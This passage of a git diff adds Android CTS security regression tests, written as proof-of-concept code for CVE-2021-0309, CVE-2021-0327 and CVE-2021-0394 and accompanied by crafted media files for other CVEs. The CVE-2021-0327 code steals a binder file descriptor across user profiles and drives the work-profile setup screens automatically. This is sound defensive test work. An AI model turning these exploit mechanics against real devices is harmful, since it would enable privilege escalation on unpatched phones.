<protected-broadcast android:name="android.intent.action.MANAGED_PROFILE_ADDED" /> <protected-broadcast android:name="android.intent.action.MANAGED_PROFILE_UNLOCKED" /> diff --git a/tests/tests/provider/Android.bp b/tests/tests/provider/Android.bp index 4c797d056ee..7dac784ac3c 100644 --- a/tests/tests/provider/Android.bp +++ b/tests/tests/provider/Android.bp @@ -9,6 +9,7 @@ android_test { "cts", "vts10", "general-tests", + "sts", ], libs: [ diff --git a/tests/tests/provider/preconditions/Android.bp b/tests/tests/provider/preconditions/Android.bp index 31247b048b7..93868ac94d5 100644 --- a/tests/tests/provider/preconditions/Android.bp +++ b/tests/tests/provider/preconditions/Android.bp @@ -11,6 +11,7 @@ java_test_helper_library { "cts", "vts10", "general-tests", + "sts" ], host_supported: true, device_supported: false, diff --git a/tests/tests/provider/src/android/provider/cts/media/MediaStore_Video_MediaTest.java b/tests/tests/provider/src/android/provider/cts/media/MediaStore_Video_MediaTest.java index 5026c0ed50b..7707f12cdd8 100644 --- a/tests/tests/provider/src/android/provider/cts/media/MediaStore_Video_MediaTest.java +++ b/tests/tests/provider/src/android/provider/cts/media/MediaStore_Video_MediaTest.java @@ -38,6 +38,7 @@ import android.os.Environment; import android.os.FileUtils; import android.os.ParcelFileDescriptor; import android.os.storage.StorageManager; +import android.platform.test.annotations.SecurityTest; import android.provider.MediaStore; import android.provider.MediaStore.Files.FileColumns; import android.provider.MediaStore.Video.Media; @@ -254,6 +255,7 @@ public class MediaStore_Video_MediaTest { } } + @SecurityTest @Test public void testIsoLocationRedaction() throws Exception { // STOPSHIP: remove this once isolated storage is always enabled diff --git a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java index 5584fabf91f..16d595fb584 100644 --- a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java +++ b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java @@ -27,6 +27,7 @@ import android.content.res.Configuration; import android.database.Cursor; import android.net.Uri; import android.os.SystemClock; +import android.platform.test.annotations.SecurityTest; import android.provider.Settings; import android.provider.Settings.SettingNotFoundException; import android.provider.Settings.System; @@ -139,6 +140,10 @@ public class Settings_SystemTest { } } + /** + * Verifies that the invalid values for the font scale setting are rejected. + */ + @SecurityTest(minPatchLevel = "2021-02") @Test public void testSystemSettingsRejectInvalidFontSizeScale() throws SettingNotFoundException { final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver(); diff --git a/tests/tests/security/Android.bp b/tests/tests/security/Android.bp index 41d9fad8879..743ea88c00c 100644 --- a/tests/tests/security/Android.bp +++ b/tests/tests/security/Android.bp @@ -27,6 +27,7 @@ android_test { "compatibility-common-util-devicesidelib", "guava", "platform-test-annotations", + "hamcrest-library", ], libs: [ "android.test.runner.stubs", @@ -53,6 +54,7 @@ android_test { "src/**/*.java", "src/android/security/cts/activity/ISecureRandomService.aidl", "aidl/android/security/cts/IIsolatedService.aidl", + "aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl", ], //sdk_version: "current", platform_apis: true, @@ -75,4 +77,4 @@ android_test_helper_app { android_app_certificate { name: "security_cts_test_certificate", certificate: "security_cts_test_cert", -}
\ No newline at end of file +} diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml index ad23b0763d5..31f4c59d79a 100644 --- a/tests/tests/security/AndroidManifest.xml +++ b/tests/tests/security/AndroidManifest.xml @@ -102,6 +102,71 @@ <data android:mimeType="application/vnd.android.package-archive" /> </intent-filter> </receiver> + + <activity android:name="android.security.cts.CVE_2021_0339$FirstActivity" + android:label="TAT Anim1" + android:exported="true"> + <intent-filter> + <action android:name="android.intent.action.MAIN"/> + <category android:name="android.intent.category.LAUNCHER"/> + </intent-filter> + </activity> + + <activity android:name="android.security.cts.CVE_2021_0339$SecondActivity" + android:label="TAT Anim2" + android:exported="true"> + <intent-filter> + <action android:name="android.intent.action.MAIN"/> + <category android:name="android.intent.category.LAUNCHER"/> + </intent-filter> + </activity> + + <activity android:name="android.security.cts.CVE_2021_0327.IntroActivity"> + <intent-filter> + <action android:name="android.intent.action.MAIN" /> + <category android:name="android.intent.category.LAUNCHER" /> + </intent-filter> + </activity> + + <activity android:name="android.security.cts.CVE_2021_0327.OtherUserActivity"> + <intent-filter> + <action android:name="android.intent.action.MAIN" /> + <category android:name="android.intent.category.LAUNCHER" /> + </intent-filter> + </activity> + + <activity android:name="android.security.cts.CVE_2021_0327.TestActivity"> + <intent-filter> + <action android:name="android.intent.action.MAIN" /> + <category android:name="android.intent.category.LAUNCHER" /> + </intent-filter> + </activity> + + <activity android:name="android.security.cts.CVE_2021_0327.workprofilesetup.ProvisionedActivity"> + <intent-filter> + <action android:name="android.app.action.PROVISIONING_SUCCESSFUL" /> + <category android:name="android.intent.category.DEFAULT" /> + </intent-filter> + </activity> + + <receiver + android:name="android.security.cts.CVE_2021_0327.workprofilesetup.AdminReceiver" + android:permission="android.permission.BIND_DEVICE_ADMIN"> + <meta-data + android:name="android.app.device_admin" + android:resource="@xml/device_admin" /> + <intent-filter> + <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" /> + </intent-filter> + </receiver> + + <provider + android:name="android.security.cts.CVE_2021_0327.BadProvider" + android:authorities="android.security.cts.CVE_2021_0327.BadProvider" + android:exported="false" + android:grantUriPermissions="true" + android:process=":badprovider" /> + </application> <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner" diff --git a/tests/tests/security/AndroidTest.xml b/tests/tests/security/AndroidTest.xml index a7d1edeaeb8..6e0c8bc4f69 100644 --- a/tests/tests/security/AndroidTest.xml +++ b/tests/tests/security/AndroidTest.xml @@ -17,7 +17,8 @@ <option name="test-suite-tag" value="cts" /> <option name="config-descriptor:metadata" key="component" value="security" /> <option name="config-descriptor:metadata" key="parameter" value="not_multi_abi" /> - <option name="config-descriptor:metadata" key="parameter" value="instant_app" /> + <!-- CtsDeviceInfo target API is 23; instant app requires target API >= 26. --> + <option name="config-descriptor:metadata" key="parameter" value="not_instant_app" /> <option name="config-descriptor:metadata" key="parameter" value="secondary_user" /> <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller"> <option name="cleanup-apks" value="true" /> @@ -33,6 +34,16 @@ value="appops reset android.security.cts" /> </target_preparer> + <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer"> + <option name="teardown-command" + value="pm remove-user 10" /> + </target_preparer> + + <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer"> + <option name="teardown-command" + value="pm uninstall --user 0 android.security.cts" /> + </target_preparer> + <test class="com.android.tradefed.testtype.AndroidJUnitTest" > <option name="package" value="android.security.cts" /> <option name="runtime-hint" value="1h40m18s" /> diff --git a/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl b/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl new file mode 100644 index 00000000000..e71f2c8fc0d --- /dev/null +++ b/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl @@ -0,0 +1,10 @@ +// IBadProvider.aidl +package android.security.cts.CVE_2021_0327; + +// Declare any non-default types here with import statements +import android.os.ParcelFileDescriptor; +interface IBadProvider { + ParcelFileDescriptor takeBinder(); + + oneway void exit(); +} diff --git a/tests/tests/security/jni/Android.bp b/tests/tests/security/jni/Android.bp index b667f18252b..60f934869c7 100644 --- a/tests/tests/security/jni/Android.bp +++ b/tests/tests/security/jni/Android.bp @@ -20,6 +20,7 @@ cc_library { "android_security_cts_NativeCodeTest.cpp", "android_security_cts_MMapExecutableTest.cpp", "android_security_cts_EncryptionTest.cpp", + "android_security_cts_cve_2021_0394.cpp", ], shared_libs: [ "libcrypto", diff --git a/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp b/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp index 7490d1ad37e..06e57f18930 100644 --- a/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp +++ b/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp @@ -22,6 +22,7 @@ extern int register_android_security_cts_NativeCodeTest(JNIEnv*); extern int register_android_security_cts_SeccompTest(JNIEnv*); extern int register_android_security_cts_MMapExecutableTest(JNIEnv* env); extern int register_android_security_cts_EncryptionTest(JNIEnv* env); +extern int register_android_security_cts_cve_2021_0394(JNIEnv* env); jint JNI_OnLoad(JavaVM *vm, void *) { JNIEnv *env = NULL; @@ -46,5 +47,9 @@ jint JNI_OnLoad(JavaVM *vm, void *) { return JNI_ERR; } + if (register_android_security_cts_cve_2021_0394(env)) { + return JNI_ERR; + } + return JNI_VERSION_1_4; } diff --git a/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp b/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp new file mode 100644 index 00000000000..66b57925f93 --- /dev/null +++ b/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp @@ -0,0 +1,51 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <jni.h> +#include <string.h> + +static constexpr char kDefaultValue = 'x'; +static constexpr size_t kStringLength = 4096; + +jboolean android_security_cts_cve_2021_0394_poc(JNIEnv* env, jobject thiz) { + (void) thiz; + char array[kStringLength]; + memset(array, kDefaultValue, kStringLength - 1); + array[kStringLength - 1] = 0; + jstring s = env->NewStringUTF(array); + jboolean isVulnerable = false; + char invalidChars[] = { '\xc0', '\xe0', '\xf0' }; + for (int c = 0; c < sizeof(invalidChars) / sizeof(char); ++c) { + char invalid = invalidChars[c]; + array[kStringLength - 2] = invalid; + s = env->NewStringUTF(array); + const char* UTFChars = env->GetStringUTFChars(s, nullptr); + if (UTFChars[kStringLength - 2] != '?') { + isVulnerable = true; + } + env->ReleaseStringUTFChars(s, UTFChars); + } + return isVulnerable; +} + +static JNINativeMethod gMethods[] = { { "poc", "()Z", + (void*) android_security_cts_cve_2021_0394_poc }, }; + +int register_android_security_cts_cve_2021_0394(JNIEnv* env) { + jclass clazz = env->FindClass("android/security/cts/CVE_2021_0394"); + return env->RegisterNatives(clazz, gMethods, + sizeof(gMethods) / sizeof(JNINativeMethod)); +} diff --git a/tests/tests/security/res/anim/translate1.xml b/tests/tests/security/res/anim/translate1.xml new file mode 100644 index 00000000000..da2ee564649 --- /dev/null +++ b/tests/tests/security/res/anim/translate1.xml @@ -0,0 +1,7 @@ +<?xml version="1.0" encoding="utf-8"?> +<translate + xmlns:android="http://schemas.android.com/apk/res/android" + android:fromYDelta="0%" + android:toYDelta="-100%" + android:interpolator="@android:anim/linear_interpolator" + android:duration="10000" /> diff --git a/tests/tests/security/res/anim/translate2.xml b/tests/tests/security/res/anim/translate2.xml new file mode 100644 index 00000000000..d4bc6d90fbe --- /dev/null +++ b/tests/tests/security/res/anim/translate2.xml @@ -0,0 +1,7 @@ +<?xml version="1.0" encoding="utf-8"?> +<translate + xmlns:android="http://schemas.android.com/apk/res/android" + android:fromYDelta="100%" + android:toYDelta="0%" + android:interpolator="@android:anim/linear_interpolator" + android:duration="10000" /> diff --git a/tests/tests/security/res/raw/cve_2018_13925.ts b/tests/tests/security/res/raw/cve_2018_13925.ts Binary files differnew file mode 100644 index 00000000000..53656252aaf --- /dev/null +++ b/tests/tests/security/res/raw/cve_2018_13925.ts diff --git a/tests/tests/security/res/raw/cve_2019_14013.mp4 b/tests/tests/security/res/raw/cve_2019_14013.mp4 Binary files differnew file mode 100644 index 00000000000..23287514945 --- /dev/null +++ b/tests/tests/security/res/raw/cve_2019_14013.mp4 diff --git a/tests/tests/security/res/raw/cve_2019_2107_framelen.mp4 b/tests/tests/security/res/raw/cve_2019_2107_framelen.mp4 new file mode 100644 index 00000000000..b64071290be --- /dev/null +++ b/tests/tests/security/res/raw/cve_2019_2107_framelen.mp4 @@ -0,0 +1,6 @@ +943 +243 +636 +979 +421 +266 diff --git a/tests/tests/security/res/raw/cve_2019_2107_hevc.mp4 b/tests/tests/security/res/raw/cve_2019_2107_hevc.mp4 Binary files differnew file mode 100644 index 00000000000..a6665024bd8 --- /dev/null +++ b/tests/tests/security/res/raw/cve_2019_2107_hevc.mp4 diff --git a/tests/tests/security/res/raw/cve_2019_2245.ts b/tests/tests/security/res/raw/cve_2019_2245.ts Binary files differnew file mode 100644 index 00000000000..4952466c6bc --- /dev/null +++ b/tests/tests/security/res/raw/cve_2019_2245.ts diff --git a/tests/tests/security/res/raw/cve_2020_11122.mkv b/tests/tests/security/res/raw/cve_2020_11122.mkv Binary files differnew file mode 100644 index 00000000000..f0fa08f22af --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_11122.mkv diff --git a/tests/tests/security/res/raw/cve_2020_11139.flac b/tests/tests/security/res/raw/cve_2020_11139.flac Binary files differnew file mode 100644 index 00000000000..3700ba9ab23 --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_11139.flac diff --git a/tests/tests/security/res/raw/cve_2020_11168.mkv b/tests/tests/security/res/raw/cve_2020_11168.mkv Binary files differnew file mode 100644 index 00000000000..58bf85e42d2 --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_11168.mkv diff --git a/tests/tests/security/res/raw/cve_2020_3633.mp2 b/tests/tests/security/res/raw/cve_2020_3633.mp2 Binary files differnew file mode 100644 index 00000000000..9c680444164 --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_3633.mp2 diff --git a/tests/tests/security/res/raw/cve_2020_3658.mp4 b/tests/tests/security/res/raw/cve_2020_3658.mp4 Binary files differnew file mode 100644 index 00000000000..a8ae3167fb3 --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_3658.mp4 diff --git a/tests/tests/security/res/raw/cve_2020_3660.mp4 b/tests/tests/security/res/raw/cve_2020_3660.mp4 Binary files differnew file mode 100644 index 00000000000..9e0c1bf985f --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_3660.mp4 diff --git a/tests/tests/security/res/raw/cve_2020_3661.mp4 b/tests/tests/security/res/raw/cve_2020_3661.mp4 Binary files differnew file mode 100644 index 00000000000..e8221794138 --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_3661.mp4 diff --git a/tests/tests/security/res/raw/cve_2020_3662.mp4 b/tests/tests/security/res/raw/cve_2020_3662.mp4 Binary files differnew file mode 100644 index 00000000000..4fd269e761b --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_3662.mp4 diff --git a/tests/tests/security/res/raw/cve_2020_3663.mp4 b/tests/tests/security/res/raw/cve_2020_3663.mp4 Binary files differnew file mode 100644 index 00000000000..54af26cad62 --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_3663.mp4 diff --git a/tests/tests/security/res/raw/cve_2020_3688.mp4 b/tests/tests/security/res/raw/cve_2020_3688.mp4 Binary files differnew file mode 100644 index 00000000000..18ec0ad8be4 --- /dev/null +++ b/tests/tests/security/res/raw/cve_2020_3688.mp4 diff --git a/tests/tests/security/res/xml/device_admin.xml b/tests/tests/security/res/xml/device_admin.xml new file mode 100644 index 00000000000..5760898fa30 --- /dev/null +++ b/tests/tests/security/res/xml/device_admin.xml @@ -0,0 +1,14 @@ +<?xml version ="1.0" encoding ="utf-8"?> +<device-admin> + <uses-policies> +<!-- <limit-password/>--> +<!-- <watch-login/>--> +<!-- <reset-password/>--> +<!-- <force-lock/>--> +<!-- <wipe-data/>--> +<!-- <expire-password/>--> +<!-- <encrypted-storage/>--> +<!-- <disable-camera/>--> +<!-- <disable-keyguard-features/>--> + </uses-policies> +</device-admin> diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0309.java b/tests/tests/security/src/android/security/cts/CVE_2021_0309.java new file mode 100644 index 00000000000..3f39a0ef85f --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0309.java @@ -0,0 +1,94 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package android.security.cts; + +import static org.junit.Assert.assertFalse; + +import android.accounts.Account; +import android.accounts.AccountAuthenticatorResponse; +import android.accounts.AccountManager; +import android.accounts.GrantCredentialsPermissionActivity; +import android.accounts.IAccountAuthenticatorResponse; +import android.content.Context; +import android.content.Intent; +import android.os.Bundle; +import android.os.RemoteException; +import android.platform.test.annotations.SecurityTest; + +import androidx.test.InstrumentationRegistry; +import androidx.test.runner.AndroidJUnit4; + +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(AndroidJUnit4.class) +public class CVE_2021_0309 { + private final Context mContext = InstrumentationRegistry.getContext(); + boolean isVulnerable = true; + + /** + * b/159145361 + */ + @SecurityTest(minPatchLevel = "2021-01") + @Test + public void testPocCVE_2021_0309() { + /** + * Output of adb shell pm list packages --user 0 -U com.android.providers.media + * package:com.android.providers.media uid:10008 + */ + final int REQUESTED_UID = 10008; + Intent intent = new Intent(); + intent.setClassName("android", + "android.accounts.GrantCredentialsPermissionActivity"); + intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); + intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_ACCOUNT, + new Account("abc@xyz.org", "com.my.auth")); + intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_AUTH_TOKEN_TYPE, + AccountManager.ACCOUNT_ACCESS_TOKEN_TYPE); + intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_RESPONSE, + new AccountAuthenticatorResponse(new IAccountAuthenticatorResponse.Stub() { + @Override + public void onResult(Bundle value) throws RemoteException { + } + + @Override + public void onRequestContinued() { + } + + @Override + public void onError(int errorCode, String errorMessage) throws RemoteException { + /** + * GrantCredentialsPermissionActivity's onCreate() should not execute and + * should return error when the requested UID does not match the process's UID + */ + isVulnerable = false; + } + })); + + intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_REQUESTING_UID, + REQUESTED_UID); + mContext.startActivity(intent); + /** + * Sleep for 5 seconds to ensure that the AccountAuthenticatorResponse callback gets + * triggered if vulnerability is fixed. + */ + try { + Thread.sleep(5000); + } catch (Exception e) { + } + assertFalse(isVulnerable); + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322.java b/tests/tests/security/src/android/security/cts/CVE_2021_0322.java deleted file mode 100644 index 2233005ed47..00000000000 --- a/tests/tests/security/src/android/security/cts/CVE_2021_0322.java +++ /dev/null @@ -1,80 +0,0 @@ -/* - * Copyright (C) 2020 The Android Open Source Project - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package android.security.cts; - -import static org.junit.Assert.assertTrue; - -import android.app.PendingIntent; -import android.content.Context; -import android.content.Intent; -import android.content.pm.ProviderInfo; -import android.net.Uri; -import android.os.Bundle; - -import androidx.test.InstrumentationRegistry; -import androidx.test.runner.AndroidJUnit4; - -import org.junit.Test; -import org.junit.runner.RunWith; - -import android.platform.test.annotations.SecurityTest; - -@RunWith(AndroidJUnit4.class) -public class CVE_2021_0322 { - - private static final Uri BASE_URI = Uri.parse("content://android.security.cts.local/main"); - private final Context mContext = InstrumentationRegistry.getContext(); - - boolean isVulnerable = false; - boolean onFinishedExecuted = false; - - /** - * b/159145361 - */ - @SecurityTest(minPatchLevel = "2021-01") - @Test - public void testPocCVE_2021_0322() { - CVE_2021_0322_SliceProvider serviceProvider = new CVE_2021_0322_SliceProvider(); - serviceProvider.attachInfo(mContext, new ProviderInfo()); - PendingIntent pi = serviceProvider.onCreatePermissionRequest(BASE_URI); - PendingIntent.OnFinished onFinish = new PendingIntent.OnFinished() { - public void onSendFinished(PendingIntent pi, Intent intent, - int resultCode, String resultData, Bundle resultExtras) { - String packageName = intent.getStringExtra("provider_pkg"); - if(packageName != null) { - isVulnerable = true; - } - onFinishedExecuted = true; - } - }; - /* Execute the intent - the result is not required as the focus is */ - /* the intent which was used. Hence ignore the exceptions. */ - try { - pi.send(0, onFinish, null); - } catch (Exception e) { - } - /* Wait till the intent finishes. PendingIntent.OnFinished would be */ - /* exectuted and the details of the intent which was executed would */ - /* checked. */ - try { - while(!onFinishedExecuted) { - Thread.sleep(1000); //Sleep for 1 second - } - assertTrue(!isVulnerable); - } catch (Exception e) { - } - } -} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java new file mode 100644 index 00000000000..d0b6cad3084 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java @@ -0,0 +1,76 @@ +package android.security.cts.CVE_2021_0327; + +import android.content.ContentProvider; +import android.content.ContentValues; +import android.database.Cursor; +import android.net.Uri; +import android.os.Bundle; +import android.os.ParcelFileDescriptor; +import android.os.Process; +import android.os.RemoteException; +import android.system.ErrnoException; +import android.system.Os; + +import java.io.IOException; + +public class BadProvider extends ContentProvider { + @Override + public boolean onCreate() { + return true; + } + + @Override + public Bundle call(String method, String arg, Bundle extras) { + if ("get_aidl".equals(method)) { + Bundle bundle = new Bundle(); + bundle.putBinder("a", new IBadProvider.Stub() { + @Override + public ParcelFileDescriptor takeBinder() throws RemoteException { + for (int i = 0; i < 100; i++) { + try { + String name = Os.readlink("/proc/" + Process.myPid() + "/fd/" + i); + // Log.v("TAKEBINDER", "fd=" + i + " path=" + name); + if (name.startsWith("/dev/") && name.endsWith("/binder")) { + return ParcelFileDescriptor.fromFd(i); + } + } catch (ErrnoException | IOException e) { + } + } + return null; + } + + @Override + public void exit() throws RemoteException { + System.exit(0); + } + }); + return bundle; + } + return super.call(method, arg, extras); + } + + @Override + public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) { + return null; + } + + @Override + public String getType(Uri uri) { + return null; + } + + @Override + public Uri insert(Uri uri, ContentValues values) { + return null; + } + + @Override + public int delete(Uri uri, String selection, String[] selectionArgs) { + return 0; + } + + @Override + public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) { + return 0; + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java new file mode 100644 index 00000000000..56408ee0c94 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java @@ -0,0 +1,81 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.CVE_2021_0327; + +import android.app.Activity; +import android.content.Context; +import android.content.Intent; +import android.platform.test.annotations.SecurityTest; +import android.test.AndroidTestCase; +import android.util.Log; +import androidx.test.runner.AndroidJUnit4; +import androidx.test.InstrumentationRegistry; +import org.junit.Test; +import org.junit.runner.RunWith; +import static org.junit.Assert.assertFalse; +import static org.junit.Assert.assertTrue; + +@SecurityTest +@RunWith(AndroidJUnit4.class) +public class CVE_2021_0327 { + + private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts"; + private static final String TAG = "CVE_2021_0327"; + public static boolean testActivityRequested; + public static boolean testActivityCreated; + public static String errorMessage = null; + + private void launchActivity(Class<? extends Activity> clazz) { + final Context context = InstrumentationRegistry.getInstrumentation().getContext(); + final Intent intent = new Intent(Intent.ACTION_MAIN); + intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName()); + intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); + context.startActivity(intent); + } + + /** + * b/175817081 + */ + @Test + @SecurityTest + public void testPocCVE_2021_0327() throws Exception { + Log.d(TAG, "test start"); + testActivityCreated=false; + testActivityRequested=false; + launchActivity(IntroActivity.class); + synchronized(CVE_2021_0327.class){ + if(!testActivityRequested) { + Log.d(TAG, "test is waiting for TestActivity to be requested to run"); + CVE_2021_0327.class.wait(); + Log.d(TAG, "got signal"); + } + } + synchronized(CVE_2021_0327.class){ + if(!testActivityCreated) { + Log.d(TAG, "test is waiting for TestActivity to run"); + CVE_2021_0327.class.wait(10000); + Log.d(TAG, "got signal"); + } + } + Log.d(TAG, "test completed. testActivityCreated=" + testActivityCreated); + if(errorMessage != null){ + Log.d(TAG, "errorMessage=" + errorMessage); + } + assertTrue(errorMessage==null); + assertFalse(testActivityCreated); + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java new file mode 100644 index 00000000000..fd2af3a8da1 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java @@ -0,0 +1,129 @@ +package android.security.cts.CVE_2021_0327; + +import android.app.Activity; +import android.app.AlertDialog; +import android.app.admin.DevicePolicyManager; +import android.content.ClipData; +import android.content.ComponentName; +import android.content.Intent; +import android.net.Uri; +import android.os.Bundle; +import android.view.View; +import android.util.Log; +import android.os.SystemClock; + +//import android.support.test.InstrumentationRegistry; +import androidx.test.InstrumentationRegistry; +import android.support.test.uiautomator.UiDevice; +import android.support.test.uiautomator.UiObject2; +import android.support.test.uiautomator.By; +import android.support.test.uiautomator.BySelector; +import java.io.*; +import java.util.stream.Collectors; + +import android.security.cts.CVE_2021_0327.workprofilesetup.AdminReceiver; + +public class IntroActivity extends Activity { + + private static final int AR_WORK_PROFILE_SETUP = 1; + private static final String TAG = "CVE_2021_0327"; + + private void launchOtherUserActivity() { + Log.d(TAG,"launchOtherUserActivity()"); + Intent intent = new Intent(this, OtherUserActivity.class); + intent.setClipData(new ClipData("d", new String[]{"a/b"}, new ClipData.Item(Uri.parse("content://android.security.cts.CVE_2021_0327.BadProvider")))); + intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION); + startActivity(intent); + finish(); + } + + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + Log.d(TAG,"IntroActivity.OnCreate()"); + if (isProfileOwner()) { + } else if (canLaunchOtherUserActivity()) { + launchOtherUserActivity(); + } else { + setupWorkProfile(null); + + //detect buttons to click + boolean profileSetUp=false; + String button; + java.util.List<UiObject2> objects; + UiDevice mUiDevice = UiDevice.getInstance(InstrumentationRegistry.getInstrumentation()); + BySelector selector = By.clickable(true); + + + while(!profileSetUp){ + do { + Log.i(TAG, "waiting for clickable"); + SystemClock.sleep(3000); + } while((objects = mUiDevice.findObjects(selector)).size()==0); + for(UiObject2 o : objects){ + button=o.getText(); + Log.d(TAG,"button:" + button); + + if(button==null){ + continue; + } + + switch(button){ + case "Delete" : + o.click(); + Log.i(TAG, "clicked: Delete"); + break; + case "Accept & continue" : + o.click(); + Log.i(TAG, "clicked: Accept & continue"); + break; + case "Next" : + o.click(); + profileSetUp=true; + Log.i(TAG, "clicked: Next"); + break; + default : + continue; + } + break; + } + } + //end while(!profileSetUp); + } + } + + private boolean isProfileOwner() { + return getSystemService(DevicePolicyManager.class).isProfileOwnerApp(getPackageName()); + } + + private boolean canLaunchOtherUserActivity() { + Intent intent = new Intent("android.security.cts.CVE_2021_0327.OTHER_USER_ACTIVITY"); + return (getPackageManager().resolveActivity(intent, 0) != null); + } + + public void setupWorkProfile(View view) { + Log.d(TAG, "setupWorkProfile()"); + Intent intent = new Intent(DevicePolicyManager.ACTION_PROVISION_MANAGED_PROFILE); + intent.putExtra( + DevicePolicyManager.EXTRA_PROVISIONING_DEVICE_ADMIN_COMPONENT_NAME, + new ComponentName(this, AdminReceiver.class) + ); + startActivityForResult(intent, AR_WORK_PROFILE_SETUP); + } + + @Override + protected void onActivityResult(int requestCode, int resultCode, Intent data) { + Log.d(TAG, "onActivityResult()"); + if (requestCode == AR_WORK_PROFILE_SETUP) { + if (resultCode == RESULT_OK) { + launchOtherUserActivity(); + } else { + new AlertDialog.Builder(this) + .setMessage("Work profile setup failed") + .setPositiveButton("ok", null) + .show(); + } + } + super.onActivityResult(requestCode, resultCode, data); + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java new file mode 100644 index 00000000000..3ed38dee35f --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java @@ -0,0 +1,94 @@ +package android.security.cts.CVE_2021_0327; + +import android.annotation.SuppressLint; +import android.app.Activity; +import android.app.AlertDialog; +import android.net.Uri; +import android.os.AsyncTask; +import android.os.Bundle; +import android.os.Handler; +import android.os.IBinder; +import android.os.ParcelFileDescriptor; +import android.os.ResultReceiver; +import android.view.View; +import android.util.Log; +import java.io.File; +import 